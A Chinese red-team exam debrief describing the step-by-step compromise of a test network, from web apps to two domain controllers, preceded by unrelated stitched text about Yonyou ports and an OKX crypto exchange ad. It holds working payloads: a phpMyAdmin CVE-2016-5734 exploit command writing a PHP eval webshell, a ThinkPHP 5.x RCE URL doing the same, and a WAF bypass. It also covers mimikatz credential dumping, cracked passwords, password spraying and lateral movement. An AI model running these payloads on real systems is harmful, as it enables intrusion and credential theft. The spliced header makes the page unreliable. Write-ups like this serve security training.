用友远程加的端口是211和(用友端口设置)
欧易okx交易所下载
欧易交易所又称欧易OKX,是世界领先的数字资产交易所,主要面向全球用户提供比特币、莱特币、以太币等数字资产的现货和衍生品交易服务,通过使用区块链技术为全球交易者提供高级金融服务。
大家好,我是老李。今天给大家分享一下某单位内部的一次简单的攻防考核的复盘过程,希望能够给从事相关工作的小伙伴们一些启发。
目录
0x00 前言0x01 信息搜集0x02 10.255.200.23 phpmyadmin远程代码执行0x03 10.255.220.220 致远OA session泄露任意文件上传0x04 10.10.220.101 SqlServer命令执行0x05 10.255.200.44 泛微OA远程代码执行0x06 80.1.1.36 用友OA远程命令执行0x07 80.1.1.12 ThinkPHP5.x远程代码执行0x08 80.1.1.15、80.1.1.88、 10.255.200.20和80.1.1.37 密码复用0x09 50.1.1.180(DC1)0x10 50.1.1.181(DC2)0x11 40.1.1.990x12 40.1.1.128 密码复用0x13 60.1.1.35、60.1.1.112、60.1.1.120和60.1.1.121 密码复用0x14 总结
前段时间进行了一次攻防考核,时间为一周,边干活边考核,所以基本都在晚上活动。之前一直没有复盘这个过程,今天趁此机会整理一下。
0x00 前言
靶标是商业计划书,但是因为是考核,所以目标主要还是以拿权限为主。正如所见,我的文笔就如技术一样拉胯,所以如果有不足的地方请各位大佬多多包涵,也希望各位大佬多多指正。言归正传,给的入口是4个网段,分别是10.255.200.、10.255.210.、10.255.220.和10.255.230.
0x01 信息搜集
使用fsan工具快速扫描,发现 10.255.200.1/24段存在大量主机,其他三个网段没扫出来,再使用nmap扫描发现10.255.220.1/24网段存在一台主机,如下图:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3a82fcbd2392adb.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/7a4ba58d68d46be.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/cf7a9a4fb1ee460.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/42b860b4821084.jpg)
接下来开始漏洞搜集和利用
0x02 10.255.200.23 phpmyadmin远程代码执行
访问首页发现是有PHPmyadmin(忘截图了),尝试用弱口令root/root成功登录
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/97cd7c898d58.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/8d15ad4056afb2b.jpg)
从后台可以看出版本为4.4.15.6,这个版本存在远程代码执行漏洞CVE-2016-5734,既然已经知道账号和密码,就可以执行利用这个漏洞执行命令了
EXP地址:https://www.exploit-db.com/exploits/40185
执行命令:
python exp.py -u root --pwd="root" http://10.255.200.23:8080 -c "system('whoami');"
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/caa984fdd91b.jpg)
写入webshell:
python exp.py -u root --pwd="root" http://10.255.200.23:8080 -c "file\_put\_contents('shell.php',base64\_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbbWRybWRyXSk7Pz4='));"
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/78f1b504994415e.jpg)
连接webshell:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3579769192bd00.jpg)
0x03 10.255.220.220 致远OA session泄露任意文件上传
刚开始我以为漏洞利用点是命令执行,后面才发现是利用session泄露任意文件上传漏洞
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/0b5b0d2736a10cc.jpg)
session泄露
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/da24d9b4b80df19.jpg)
漏洞利用参考:https://blog.csdn.net/maverickpig/article/details/118916085
参考链接中的脚本我使用时有点问题,第一次请求获取cookie后第二次文件上传没有带上cookie,所以脚本中的cookie是我手动获取cookie后加上去的,可能是我环境的原因,无伤大雅。可以将get_cookie函数中的cookies设置为第一次获取的cookie值,比如这样:
cookies = {"JSESSIONID":"6C86F4036B5933A4DC56AF3754B41703"}
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/6e7ab279870f20b.jpg)
冰蝎连接webshell,然后上线CS
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/28066793ecabde1.jpg)
使用svc-exe提权:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/eb7daede06154df.jpg)
运行mimimkatz抓取10.10.220.100上的密码:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3c3dbe07339c59b.jpg)
解密得到密码 seeadmin123...
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/9f6f528c2b4d687.jpg)
利用CS搭建代理:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/df5b327f08112d8.jpg)
连上代理后远程桌面:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/0276b8c282dad29.jpg)
0x04 10.10.220.101 SqlServer命令执行
远程登录10.10.220.100后执行命令查看网络连接信息,发现与主机10.10.220.101的1433端口存在连接,猜测为站库分离,如下:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/8f1c68e82760fc2.jpg)
然后在10.10.220.101上查找数据库配置文件,最终在目录C:\Seeyon\A8\S1\client下发现配置文件,如下:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/ff9f802e7ae2.jpg)
发现数据库密码密文:YjliOTIzNC8vLw==
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/9a3ae7c369b0665.jpg)
然后使用Python脚本解密,得到密码a8a8123...,脚本如下:
import base64a="YjliOTIzNC8vLw=="password=""b = base64.b64decode(a).decode("utf-8")print(b)for i in b: password+=chr(ord(i)-1)print(password)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/1bcedd92ff07c04.jpg)
使用数据库连接工具成功连接:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/eb3ba92ef938e96.jpg)
利用xp_cmdshell执行命令,下载CS马:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/4cf5e8b5c0ae74a.jpg)
之后运行木马成功上线
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/493caa819b17eb.jpg)
同样运行mimikatz抓取本地明文密码,得到密码adin1AZ123...
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/153595cdc1f33.jpg)
0x05 10.255.200.44 泛微OA远程代码执行
漏洞地址:http://10.255.200.44/weaver/bsh.servlet.BshServlet
执行命令有waf拦截:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/b782b73bd3483e0.jpg)
Unicode编码即可绕过:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/bd7923304666bd3.jpg)
执行命令将webshell代码进行base64编码后写入C:\\Ecology\\ecology\\wui\\1.txt(该目录可解析)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/44d5327d005059e.jpg)
然后 将1.txt中的代码进行base64解码后写入mdrmdr2.jsp
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/d6d4a584fe9beef.jpg)
访问webshell,成功执行命令:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/a0ddd985f33df83.jpg)
利用webshell上传CS马然后运行上线CS,同时发现其IP为80.1.1.44:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/c4273f28d9d7b3.jpg)
抓取本地密码,获取到hash值:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/50e57d62deba822.jpg)
在线解密得到密码admin@123456
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/576b1c90e542b28.jpg)
使用CS搭建代理,挂上代理后对C段80.1.1.1/24进行扫描,部分内容如下:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/d6b45361e562d99.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3cb14a189949e87.jpg)
看到这个结果后我头皮发麻,让有选择困难症的我一时无从下手
0x06 80.1.1.36 用友OA远程命令执行
漏洞地址:http://80.1.1.36:801/servlet/~ic/bsh.servlet.BshServlet
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/e0eef88f36f0b52.jpg)
利用方式和10.255.200.44一样,写入webshell(过程略):
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/820e6ae11efa64b.jpg)
同样的方法上传CS马执行上线,发现为一台DC:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3be8aad7a18cc06.jpg)
抓取主机上的密码:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3486e35dfec0.jpg)
解密得到 密码admin@12345+
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/ad43d19b846454.jpg)
0x07 80.1.1.12 ThinkPHP5.x远程代码执行
熟系的首页,以及醒目的ThinkPHP
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/eae5b73cced2db6.jpg)
发现其果然存在远程命令执行漏洞,利用远程命令执行漏洞写入webshell:
http://80.1.1.12/?s=index/\\think\\app/invokefunction&function=call\_user\_func\_array&vars\[0\]=system&vars\[1\]\[\]=echo%20^%3C?php%20@eval($\_REQUEST\[%22cmd%22\])?^%3E%3Eshell.php
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/d528b0d7c0649fb.jpg)
之后上线CS:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/f24bb9d976de3e3.jpg)
0x08 80.1.1.15、80.1.1.88、 10.255.200.20和80.1.1.37 密码复用
利用搜集到的密码制作字典,然后使用fscan工具对80.1.1.1/24进行爆破,得到80.1.1.15、80.1.1.88、10.255.200.20和80.1.1.37四台主机的权限
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/038cc104e252dcb.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3964911c0ae6345.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/c0084c741901db8.jpg)
之后将10.255.200.20上线CS,有了账号和密码可以直接使用psexec执行命令上线,我这里先将CS马拷贝过去,然后再执行上线:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/28b2aaf49f07fba.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/79fddd33267f446.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/5ad873150d9e750.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/9d622baaa748b2c.jpg)
上线后发现其IP为40.1.1.30:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/09e070cde318c07.jpg)
0x09 50.1.1.180(DC1)
上线主机40.1.1.30后进行简单主机信息搜集,发现其在xihongdream.com内,ping域名xihongdream.com,得到IP为50.1.1.180,初步判断主机50.1.1.180可能为域控
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/93e31670cd35a7b.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/caed1500ccc5f12.jpg)
执行netstat -ano命令查看网络连接情况,发现主机与50.1.1.180的389端口存在连接,因为该端口为域控常用端口,故确定主机50.1.1.180为域控(这里也可以通过端口扫描进行确认)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/edd73aa34d4ba68.jpg)
抓取本地密码hash,发现域用户oaexchange
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/03cb96322861a5a.jpg)
破解其NTLM值4fec0483465a124269c47fafd757f18f得到密码admin@1234
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/a47f263fbd343bd.jpg)
然后这里使用老方法先与域控50.1.1.180建立IPC$连接:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/b0eabd51926b0f3.jpg)
将本地的木马复制到域控上:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/65eb8ecbfab2d3b.jpg)
之后添加计划任务运行木马:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/e70e2d88dd21dbe.jpg)
成功上线:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/dd3ec6cfe92f5c4.jpg)
0x10 50.1.1.181(DC2)
在50.1.1.180上查看域内主机,发现还有一台域控DC2
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/02c0967059b3975.jpg)
然后同样用上线DC1的方法上线DC2
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/2e6bf432d3103be.jpg)
拿到DC1和DC2权限后,获取域内其他主机权限就轻而易举了,这里不作阐述
0x11 40.1.1.99
在DC1上搜集域信息,查看域信任时发现还有个子域pcin.xihongdream.com,其对应的域控IP为40.1.1.99
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3c61ffc373d894b.jpg)
利用域信任,使用凭据传递获取权限
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/0d084a490e3410f.jpg)
因为40.1.1.99不出网,需要利用40.1.1.30搭建会话中转
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/4952c0f3804256c.jpg)
然后计划任务上线:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/623bb3ddafc24b0.jpg)
0x12 40.1.1.128 密码复用
使用搜集到的密码对40.1.1.1/24进行smb登录爆破,得到40.1.1.128的密码seeadmin123...
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/90b910f10e3d0b5.jpg)
之后通过凭据传递上线CS:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/9dc232b970becc5.jpg)
打到这里的时候,我以为所有网段都已经出现了,然后就没有继续深挖。之后快结束的时候我在DC1上随手ping了一下60.1.1.1,发现居然通了,心态直接炸了,没想到还有隐藏的网段,而现在离结束只有1个小时不到
0x13 60.1.1.35、60.1.1.112、60.1.1.120和60.1.1.121 密码复用
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/46a407ce6087e00.jpg)
没办法,打点的话已经来不及了,最快速的方法就是密码复用,接着使用之前的密码字典爆破了C段60.1.1.1/24,成功拿到了4台主机权限:
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/3edcb311e4ea617.jpg)
结果没想到又又又出现了新网段10.2.120.9(60.1.1.35)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/81aee1eb9c6436c.jpg)
![一次简单的攻防考核复盘](https://www.ivckd.com/uploadfile/202305/6f512c072d5e.jpg)
0x14 总结
问题较多,不做一一总结,简言之,思路和姿势上都存在不足,打法上也没有按照流程走,基本上都是扫到哪打到哪。这环境也实在是太大了,头皮发麻,其中有许多主机权限都来不及拿
来源:奇安信攻防社区